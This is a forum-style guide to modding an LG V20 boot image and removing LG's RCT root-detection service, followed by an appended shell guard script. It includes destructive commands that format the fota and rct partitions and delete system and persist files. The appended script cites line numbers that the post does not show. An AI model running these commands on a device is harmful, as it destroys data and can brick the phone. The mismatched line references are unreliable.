sed -n 790p /tmp/test/initrd/nonplat_file_contexts
sed -n 1029p /tmp/test/initrd/nonplat_file_contexts
sed -n 1057,1058p /tmp/test/initrd/nonplat_file_contexts
sed -n 1067p /tmp/test/initrd/nonplat_file_contexts
sed -n 10p /tmp/test/initrd/nonplat_seapp_contexts
sed -n 485p /tmp/test/initrd/nonplat_property_contexts
sed -n 1343p /tmp/test/initrd/nonplat_file_contexts
sed -n 129p /tmp/test/initrd/init.msm8996_core.rc
sed -n 133p /tmp/test/initrd/init.msm8996_core.rc
sed -n 137p /tmp/test/initrd/init.msm8996_core.rc
sed -n 141p /tmp/test/initrd/init.msm8996_core.rc
sed -n 145p /tmp/test/initrd/init.msm8996_core.rc
sed -n 7,13p /tmp/test/initrd/init.elsa.power.rc
sed -n 17p /tmp/test/initrd/init.elsa.power.rc
sed -n 19,29p /tmp/test/initrd/init.elsa.power.rc
sed -n 32,33p /tmp/test/initrd/init.elsa.power.rc
sed -n 83,105p /tmp/test/initrd/init.elsa.power.rc
sed -n 232,233p /tmp/test/initrd/init.elsa_core.rc
This is what it should look like. If not, then do not flash the modded myboot.img. I am not 100% sure all Lgv20 boot images are the same. I am 99% sure they should be the same, but just in case.
ls: cannot access '/tmp/test/initrd/sbin/bnrd': No such file or directory
ls: cannot access '/tmp/test/initrd/sbin/rctd': No such file or directory
ls: cannot access '/tmp/test/initrd/sbin/lge_fota': No such file or directory
#/dev/block/platform/.*/by-name/rct u:object_r:rct_block_device:s0
#/dev/rct u:object_r:rct_device:s0
#/(system/vendor|vendor)/bin/triton u:object_r:triton_exec:s0
#/sys/devices/system/cpu/triton(/.*)? u:object_r:sysfs_triton:s0
#/dev/triton:io u:object_r:triton_device:s0
#/dev/socket/bnrd u:object_r:bnrd_socket:s0
#/dev/socket/ccmd u:object_r:ccmd_socket:s0
#/system/bin/ccmd u:object_r:ccmd_exec:s0
#user=_app seinfo=platform name=com.lge.rctprovider domain=platform_app type=app_data_file
#sys.lge.rooted u:object_r:system_prop:s0
#/sys/module/lge_handle_panic/parameters/gen_modem_panic u:object_r:sysfs_gen_modem_panic:s0
# write /sys/module/lge_handle_panic/parameters/cancel_boot_lockup_detect 1
# write /sys/module/lge_handle_panic/parameters/pause_boot_lockup_detect 1
# write /sys/module/lge_handle_panic/parameters/pause_boot_lockup_detect 0
# write /sys/module/lge_handle_panic/parameters/cancel_boot_lockup_detect 1
# write /sys/module/lge_handle_panic/parameters/powerctl_lockup_detect ${sys.powerctl}
#service triton /system/vendor/bin/triton
# class main
# user root
# group system
# socket triton-client stream 660 system system
# disabled
# oneshot
# start triton
# write /sys/devices/system/cpu/triton/debug 16
# write /sys/devices/system/cpu/triton/enable 1
# write /sys/devices/system/cpu/triton/enforce 0
# write /sys/devices/system/cpu/triton/cur_policy 0
# chown system system /sys/devices/system/cpu/triton/enable
# chmod 664 /sys/devices/system/cpu/triton/enable
# chmod 600 /sys/devices/system/cpu/triton/aevents
# chmod 600 /sys/devices/system/cpu/triton/bevents
# chown system system /sys/devices/system/cpu/triton/cur_policy
# chmod 664 /sys/devices/system/cpu/triton/cur_policy
# chmod 664 /sys/devices/system/cpu/triton/debug
# chown system system /sys/devices/system/cpu/triton/enable
# chmod 644 /sys/devices/system/cpu/triton/enable
#service fg-dump /vendor/bin/sh /vendor/bin/fg_dump.sh 10 /data/logger/fg.log
# user root
# group root system
# class main
# disabled
# oneshot
#on property:persist.service.fg.enable=0
# stop fg-dump
#on property:persist.service.fg.enable=1
# restart fg-dump
#on property:persist.service.fg.enable=2
# restart fg-dump
#on property:persist.service.fg.enable=3
# restart fg-dump
#on property:persist.service.fg.enable=4
# restart fg-dump
#on property:persist.service.fg.enable=5
# restart fg-dump
#on property:persist.service.fg.enable=6
# restart fg-dump
#on property:persist.service.fg.enable=99
# restart fg-dump
# setprop ro.ssbd.session /dev/block/bootdevice/by-name/eksst
# export HALLIC_STATUS_PATH /sys/class/switch/smartcover/state
Continue making the myboot.img:
find . | cpio --create --format='newc' | gzip > ../myinitd.img
cd /tmp/test
nano bootimg.cfg
Delete the first line and move everything up one line.
bootsize = 0x19b15d3
ctrl-x y enter
Make the modded myboot.img file:
abootimg --create myboot.img -f bootimg.cfg -k zImage -r myinitd.img
Plug the USB cable back into the phone. The phone should still be in TWRP.
Going to write all zeros to the fota and rct devices; we don't need updates or the LG RCT device. Also going to remove the dumpstate file: it saves the logcat logs to the eMMC drive and slows down the phone a lot. The logcat files will still be saved to RAM, up to 4M, but they will be deleted when you restart or it runs out of RAM. Removing dumpstate will speed up the phone. Also there is a speed tweak; you need to change five lines in the build.prop file.
Note: If you have already used Auto_Debloat you may get some "file not found" error messages; that's okay. It just means Auto_Debloat took care of the files for you.
mkfs.ntfs /dev/block/bootdevice/by-name/fota
mkfs.fat /dev/block/bootdevice/by-name/rct
adb shell umount -l /system
adb shell mount /system
adb shell rm /system/vendor/bin/subsystem_ramdump
adb shell rm /system/bin/dumpstate
adb shell rm /system/etc/init/dumpstate.rc
adb shell rm /system/bin/ccmd
adb shell rm /system/vendor/bin/triton
adb shell rm /system/vendor/bin/fg_dump.sh
adb shell mount /persist
adb shell rm /persist/rct
adb shell rm /persist/rct.cfg
adb shell umount -l /persist
adb shell umount -l /system
Wipe dalvik cache and cache.
Reboot the phone into the bootloader (aka fastboot) from TWRP.
fastboot flash boot myboot.img
fastboot reboot
Exit out of the root user:
exit
You can unplug the USB cable now; done.
And that is what I did to remove LG RCT from my Lgv20 phone. One thing to note is that you cannot flash a new kernel to the boot.img or you will lose the modded boot.img; everything will be reset back to default. If you need to flash a kernel, then just mod the boot.img again afterwards.
If for some reason your phone does not boot anymore, we are going to flash the original boot.img.
Power off the Lgv20 or remove the battery. Hold volume down while plugging in the USB cable.
sudo su
cd /tmp/test
fastboot flash boot boot.img
fastboot reboot
Exit out of the root user:
exit
done
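The post comments out lines by number and then warns that not all boot images may be laid out identically. As an added example (not the poster's script), here is a guard that only comments out a line when it actually contains the expected entry, so a differently numbered file is left untouched instead of getting the wrong line disabled before flashing. The sample file is constructed; the entries in it are the rct lines quoted in the post, and the in-place edit is done through a temp file rather than `sed -i` so it runs on any POSIX sh.

```shell
#!/bin/sh
# Added example: guard the line-number-based sed edits from the post.
# comment_if_matches FILE LINE PATTERN
#   Comments out line LINE of FILE only when that line contains PATTERN
#   as a fixed string. Returns 0 on success and 1 (file unchanged) when
#   the line does not match, e.g. on a boot image with different numbering.
comment_if_matches() {
  file=$1; line=$2; pattern=$3
  current=$(sed -n "${line}p" "$file")
  case $current in
    *"$pattern"*)
      tmp=$(mktemp)
      sed "${line} s/^/#/" "$file" > "$tmp" && cat "$tmp" > "$file"
      rm -f "$tmp"
      return 0 ;;
    *)
      echo "line $line of $file does not contain '$pattern'; skipping" >&2
      return 1 ;;
  esac
}

# Constructed sample standing in for /tmp/test/initrd/nonplat_file_contexts.
# The rct entries sit on lines 2 and 3 here, not 605 and 964 as in the post,
# which is exactly the situation the guard is meant to catch.
make_sample_contexts() {
  printf '%s\n' \
    '/dev/block/platform/.*/by-name/misc u:object_r:misc_block_device:s0' \
    '/dev/block/platform/.*/by-name/rct u:object_r:rct_block_device:s0' \
    '/dev/rct u:object_r:rct_device:s0' > "$1"
}
```

Applied to the real initrd, each `sed -i 'N s/^/#/'` line from the post becomes `comment_if_matches FILE N 'expected text'`, and a non-zero exit tells you to stop and inspect before building myboot.img.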
reserved